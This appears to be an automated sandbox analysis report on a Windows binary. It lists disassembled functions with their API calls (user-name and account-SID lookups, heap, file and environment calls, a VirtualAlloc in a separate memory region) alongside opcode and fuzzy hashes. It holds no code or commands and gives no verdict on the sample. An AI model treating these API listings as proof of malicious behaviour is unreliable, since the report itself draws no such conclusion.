                                                                                                                                            Function 00401C20, Relevance: 27.2, APIs: 18, Instructions: 157memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 00401C4A
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00401C5F
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401C62
                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 00401C70
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00401C93
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00401C9E
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401CA1
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00401CB1
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00401CDE
                                                                                                                                            • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00401CF1
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00401D82
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401D8B
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401D90
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401D93
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401D9A
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401D9D
                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00401DA2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3326663573-0
                                                                                                                                            • Opcode ID: d989b31cdadf4881c8b22190d5f77fef550ca1f383c0ffd40c6c968102a870e3
                                                                                                                                            • Instruction ID: 5d740cbccbc7aecd9424c2ab973b1f5715f8ce92cc64a7cb0e2c3ceeedde85f2
                                                                                                                                            • Opcode Fuzzy Hash: d989b31cdadf4881c8b22190d5f77fef550ca1f383c0ffd40c6c968102a870e3
                                                                                                                                            • Instruction Fuzzy Hash: 04516075E00209ABDB20DFA5CC84FAFBBBDEF44344F15456AE905A3250EB749E05CBA4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041970A, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 0-3907804496
                                                                                                                                            • Opcode ID: fd12fb66ee6723847a94f6c31c07f5551fb915ac6191bc8621f9585a19dfb3a8
                                                                                                                                            • Instruction ID: 68eb4cd5866e5da1edd4d9018ae4073d6158bda8aeb178e670a8a67cab436560
                                                                                                                                            • Opcode Fuzzy Hash: fd12fb66ee6723847a94f6c31c07f5551fb915ac6191bc8621f9585a19dfb3a8
                                                                                                                                            • Instruction Fuzzy Hash: 2DC104B0A042459FCF15DF99C890BEEBBB4AF49304F04416EE905A7392C7789D86CB6D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041CAB7, Relevance: 13.8, APIs: 9, Instructions: 273COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041C770: CreateFileW.KERNELBASE(00000000,00000000,?,0041CB60,?,?,00000000,?,0041CB60,00000000,0000000C), ref: 0041C78D
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CBCB
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041CBD2
                                                                                                                                            • GetFileType.KERNELBASE(00000000), ref: 0041CBDE
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CBE8
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041CBF1
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041CC11
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041CD5E
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CD90
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041CD97
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4237864984-0
                                                                                                                                            • Opcode ID: 7d100adb8ef57272e29c30100c41ee3dcb7b23529d4f1c6e2bc366b466240ade
                                                                                                                                            • Instruction ID: 9a888166caf7c729a04a6387afd24b78d2efbf651294ef369ed2e80490bd9623
                                                                                                                                            • Opcode Fuzzy Hash: 7d100adb8ef57272e29c30100c41ee3dcb7b23529d4f1c6e2bc366b466240ade
                                                                                                                                            • Instruction Fuzzy Hash: 13A14832A441448FCF29DF68DC91BEE3BB1AB06324F14016EE815EB391D7389C96CB59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0210003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0210024D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                                            • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                            • Instruction ID: 4f807017887e5f8913c2aeea080479d60b6d60ee751dd1f570b2424608bbb013
                                                                                                                                            • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                            • Instruction Fuzzy Hash: 2B526974A41229DFDB64CF58C984BACBBB1BF09304F1580E9E54DAB391DB70AA85CF14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00407022, Relevance: 12.1, APIs: 3, Strings: 3, Instructions: 1618COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00407AC6
                                                                                                                                              • Part of subcall function 004041F0: GetTempPathW.KERNEL32(00000104,?,?,?,?), ref: 0040442F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PathTempXinvalid_argumentstd::_
                                                                                                                                            • String ID: :::$invalid stoi argument$stoi argument out of range
                                                                                                                                            • API String ID: 3948722134-1139504419
                                                                                                                                            • Opcode ID: ef58b5d7b2fc2acf2be8bd46d1d8b743e7a326cfe730c96aeb804ab7eba5e123
                                                                                                                                            • Instruction ID: 5a21870a1b3f15e693a5e1c71f5c19b149470408a097e6d1e3dfe317378d5c93
                                                                                                                                            • Opcode Fuzzy Hash: ef58b5d7b2fc2acf2be8bd46d1d8b743e7a326cfe730c96aeb804ab7eba5e123
                                                                                                                                            • Instruction Fuzzy Hash: A9C21671E1010897EB18DF78CD8579D7B62AF81304F50862EF849A73C6DB3D9AC48B99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00406AA0, Relevance: 4.7, APIs: 3, Instructions: 198COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PathTemp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2920410445-0
                                                                                                                                            • Opcode ID: 23b0e9fffb570bd23e9ba4d4b97d6b6ddba1e16fe5578a4b4f0ee9eb49260719
                                                                                                                                            • Instruction ID: 11c41e0c62b493da908bae2c5f8d30217ed4bb9da9ed4355a594f427151aa790
                                                                                                                                            • Opcode Fuzzy Hash: 23b0e9fffb570bd23e9ba4d4b97d6b6ddba1e16fe5578a4b4f0ee9eb49260719
                                                                                                                                            • Instruction Fuzzy Hash: 1F712370E00208CBEF04DFA8D985BDEBB75EF41308F60056AE415772C2D779A99ACB95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00417B82, Relevance: 4.7, APIs: 3, Instructions: 177fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00417317: GetConsoleCP.KERNEL32(?,00403AF0,00000000), ref: 0041735F
                                                                                                                                            • WriteFile.KERNELBASE(?,00000000,0042CEB8,?,00000000,?,00403AF0,00403AF0,00403AF0,?,?,?,00411385,?,0042CEB8,00000010), ref: 00417CD3
                                                                                                                                            • GetLastError.KERNEL32(?,00403AF0,00403AF0,00403AF0,?,?,?,00411385,?,0042CEB8,00000010,00403AF0), ref: 00417CDD
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00417D22
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 251514795-0
                                                                                                                                            • Opcode ID: 88ed46c356648d2431f951e701bd50101076533be664df1bdc63266b39295ba1
                                                                                                                                            • Instruction ID: 36d9eabd3e715f6953566ed8e5b4e0fbe87fa1013ae511c99846ca3037606271
                                                                                                                                            • Opcode Fuzzy Hash: 88ed46c356648d2431f951e701bd50101076533be664df1bdc63266b39295ba1
                                                                                                                                            • Instruction Fuzzy Hash: 3951E671A0810AABDB109FA5C845BEE7B79EF09318F140457E500A7252E779D9C1C7A9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041AD7F, Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0041AD88
                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041ADF6
                                                                                                                                              • Part of subcall function 0041AC9B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00420090,?,00000000,00000000), ref: 0041AD3D
                                                                                                                                              • Part of subcall function 004159AA: RtlAllocateHeap.NTDLL(00000000,?,?,2!A,0041A862,00000220,?,?,?,?,?,?,00412132,?), ref: 004159DC
                                                                                                                                            • _free.LIBCMT ref: 0041ADE7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2560199156-0
                                                                                                                                            • Opcode ID: 2ccccc104de4fbb99a6b5bc1a6cd37a2050fdcf250c8ed299f027ac6111690bb
                                                                                                                                            • Instruction ID: fd89c7a163a8027ad253a585f87d93024623262f666475df872d6ca9d46d71fb
                                                                                                                                            • Opcode Fuzzy Hash: 2ccccc104de4fbb99a6b5bc1a6cd37a2050fdcf250c8ed299f027ac6111690bb
                                                                                                                                            • Instruction Fuzzy Hash: 4F01FCB2703A117B272155776C89CFB686ECDC6B96315012BB904C7205F96D8C9281BB
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00415614, Relevance: 4.6, APIs: 3, Instructions: 61COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00403AF0,?,00415542,00403AF0,0042CFD8,0000000C,004155F4,0042CEB8), ref: 0041566A
                                                                                                                                            • GetLastError.KERNEL32(?,00415542,00403AF0,0042CFD8,0000000C,004155F4,0042CEB8), ref: 00415674
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041569F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 490808831-0
                                                                                                                                            • Opcode ID: 807730107f36a853c18b8d279feb0625d776876c165a816df0ebc4419417172f
                                                                                                                                            • Instruction ID: 855a1b191d83c3e9394ad136f7d9456ed2f12c59f6f5d489b6f4b645ce6e1dde
                                                                                                                                            • Opcode Fuzzy Hash: 807730107f36a853c18b8d279feb0625d776876c165a816df0ebc4419417172f
                                                                                                                                            • Instruction Fuzzy Hash: 6B01E53270065096D6201235E845BFF77494BC2738FAA026FF81D872C2DAA8CCD1959C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041CA29, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: ^SA
                                                                                                                                            • API String ID: 269201875-154051897
                                                                                                                                            • Opcode ID: 3c657778f813c6f5b268f77ec237247de32264da0647686e6659de1cfa0cedb8
                                                                                                                                            • Instruction ID: 6034d8ea27f616415ff3ffdc71913a6cbd744896c4c1229f28ba72df701dd8a7
                                                                                                                                            • Opcode Fuzzy Hash: 3c657778f813c6f5b268f77ec237247de32264da0647686e6659de1cfa0cedb8
                                                                                                                                            • Instruction Fuzzy Hash: 50014472C0015DBFCF02EFE99C01AEE7FB5AF08354F144166F914E2161E6358AA1DB95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004159AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,2!A,0041A862,00000220,?,?,?,?,?,?,00412132,?), ref: 004159DC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID: 2!A
                                                                                                                                            • API String ID: 1279760036-1441434633
                                                                                                                                            • Opcode ID: 3bd37d5dbf1b6b8b678fbc2b31860561537f1e264468bfb84b0ddc090e443fbb
                                                                                                                                            • Instruction ID: e35ac5e7cece6743c5da4249d19359c5bf9691d5dcfee95049b00cefedf1e07c
                                                                                                                                            • Opcode Fuzzy Hash: 3bd37d5dbf1b6b8b678fbc2b31860561537f1e264468bfb84b0ddc090e443fbb
                                                                                                                                            • Instruction Fuzzy Hash: 3CE0E5B1251A10DBE63126665C01BDB7A48DFC13B1F160127AC00D6290CA6CCCC281AF
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00404B45, Relevance: 3.3, APIs: 2, Instructions: 293COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00404B4E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 995ac56e202fe9ac686033bf267814d4b554351450598c42891898a022b31327
                                                                                                                                            • Instruction ID: a5cdafc06c5de68753cfc33dac955256b816e325bc38cd07ab3ab692ec57effe
                                                                                                                                            • Opcode Fuzzy Hash: 995ac56e202fe9ac686033bf267814d4b554351450598c42891898a022b31327
                                                                                                                                            • Instruction Fuzzy Hash: DE8137716101049BEB08EB79CD85B9E7666DF81304F50463EF505A72D2D77DEAC0CB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00404C72, Relevance: 3.3, APIs: 2, Instructions: 279COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00404C75
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: ba1075c0f3e3df0ee142c4b7704704d0a405d81bc836506253e44721999391ef
                                                                                                                                            • Instruction ID: 38ec967fc6cca89652e96f46a14f93b666f82d7160196d8141908d1a3359c393
                                                                                                                                            • Opcode Fuzzy Hash: ba1075c0f3e3df0ee142c4b7704704d0a405d81bc836506253e44721999391ef
                                                                                                                                            • Instruction Fuzzy Hash: 5B815771A101049BEB08EB79DD89B9E7666EF81304F50463EF504AB2D2D73DDAC0CB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00404FE7, Relevance: 3.3, APIs: 2, Instructions: 276COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00404FEA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 073be0d48712a81d16f927da105a3e4f1672f56e782e54f0fcb7feb06fdefeae
                                                                                                                                            • Instruction ID: 1b496a8202566a01a187d0a2371c9978a2df59dcd6f2c8dad7bd9fd1590a30e3
                                                                                                                                            • Opcode Fuzzy Hash: 073be0d48712a81d16f927da105a3e4f1672f56e782e54f0fcb7feb06fdefeae
                                                                                                                                            • Instruction Fuzzy Hash: 83814571A101049BEB08DB79CD85BAE7666EF41308F50463EF404AB2D2D77DDA80CF98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040510E, Relevance: 3.3, APIs: 2, Instructions: 275COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00405111
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 09ec69524f098834b54b9a91052b20cbd13ae6d406ad3d42ac1bc13e92f7c9cb
                                                                                                                                            • Instruction ID: b8c174c393774d19d91c100d689e0051ae8876b72677ef2ad20fd36fdb314877
                                                                                                                                            • Opcode Fuzzy Hash: 09ec69524f098834b54b9a91052b20cbd13ae6d406ad3d42ac1bc13e92f7c9cb
                                                                                                                                            • Instruction Fuzzy Hash: 67813671A10104ABEB18DB79CD85B9E7666EF41304F50463EF404AB2D6D77DDA80CF98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00405235, Relevance: 3.3, APIs: 2, Instructions: 274COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00405238
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 829b898cb337f5d1fae7053c19f692b6a25a5988bb37126c9586e3ed67009915
                                                                                                                                            • Instruction ID: e34818e8ee50c834f60c3cf9a8eb636ad8fcb71f95453b65552a457cbb69f5d2
                                                                                                                                            • Opcode Fuzzy Hash: 829b898cb337f5d1fae7053c19f692b6a25a5988bb37126c9586e3ed67009915
                                                                                                                                            • Instruction Fuzzy Hash: 44812571A105049BEB08DB79CD85B9E7666EF41304F50463EF405A72D2D77DDA808F98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040535C, Relevance: 3.3, APIs: 2, Instructions: 273COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 0040535F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: f61279d19c0c2c75add7996c1615ec2150be994899d07dbdd076967b1ea191f1
                                                                                                                                            • Instruction ID: d407575b5d00c801a3715add02effe9a31bdcfbbdcdc7d2061726392b83e28fb
                                                                                                                                            • Opcode Fuzzy Hash: f61279d19c0c2c75add7996c1615ec2150be994899d07dbdd076967b1ea191f1
                                                                                                                                            • Instruction Fuzzy Hash: 90812471A101089BEB08DB79CD89BAE7666EF41304F50463EF404AB2D2D77DDAC08F98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00405483, Relevance: 3.3, APIs: 2, Instructions: 272COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00405486
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 9c0c8516690dee60e8b1de9323dae685ec8a2606dc5d05795b3ba5894e442695
                                                                                                                                            • Instruction ID: 9af280d08562d4109bc0562de839ea4dbfa2e12fa281ca53c578546f101d5ffd
                                                                                                                                            • Opcode Fuzzy Hash: 9c0c8516690dee60e8b1de9323dae685ec8a2606dc5d05795b3ba5894e442695
                                                                                                                                            • Instruction Fuzzy Hash: 5F813571A101049BEB08EB79DD89B9E7A66EF41308F50463EF404A72D2D67DDAC08F98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004055AA, Relevance: 3.3, APIs: 2, Instructions: 271COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 004055AD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 3a8b80c80756d353312abae4af7526079af487de1556ce1c9531331f07675df1
                                                                                                                                            • Instruction ID: 5c196b18d3097935064304b6010d5d9716b7b1d079be1b002ad7aef5ddb30879
                                                                                                                                            • Opcode Fuzzy Hash: 3a8b80c80756d353312abae4af7526079af487de1556ce1c9531331f07675df1
                                                                                                                                            • Instruction Fuzzy Hash: 3E814671A101049BEB08EB79CD89BAE7666EF41304F50463EF409A72D2D63DDA80CF99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004056D1, Relevance: 3.3, APIs: 2, Instructions: 270COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 004056D4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 52f662ee7faf94f57c86287aa8c8625732a22ca8d44bd090b9b774e5ab143b07
                                                                                                                                            • Instruction ID: f34cbc0f273bd2a6ec27efce5b282dcf47852f5f58356958e4b98d36180e5d9c
                                                                                                                                            • Opcode Fuzzy Hash: 52f662ee7faf94f57c86287aa8c8625732a22ca8d44bd090b9b774e5ab143b07
                                                                                                                                            • Instruction Fuzzy Hash: 8E813771A101049BEB08EB79CD89BAE7666EF41308F50463EF405A72D2D77DDA80CF99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00406E83, Relevance: 3.1, APIs: 2, Instructions: 126COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00406E95
                                                                                                                                            • GetFileAttributesA.KERNELBASE(?), ref: 00406EA7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesCreateDirectoryFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3401506121-0
                                                                                                                                            • Opcode ID: b6c79e9728e4291a2ea8e548758e9391d39822d1c0f98dd72f59dcd13fa687bb
                                                                                                                                            • Instruction ID: 915f6892ff4a040348685e3d1f771afdb944e15ab6b817e7a4f8bf126eed243d
                                                                                                                                            • Opcode Fuzzy Hash: b6c79e9728e4291a2ea8e548758e9391d39822d1c0f98dd72f59dcd13fa687bb
                                                                                                                                            • Instruction Fuzzy Hash: 9F415B31E001089BDF04EBB8DD8AA9DBB36DF45314F94013AF805B33C2D73899958799
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%
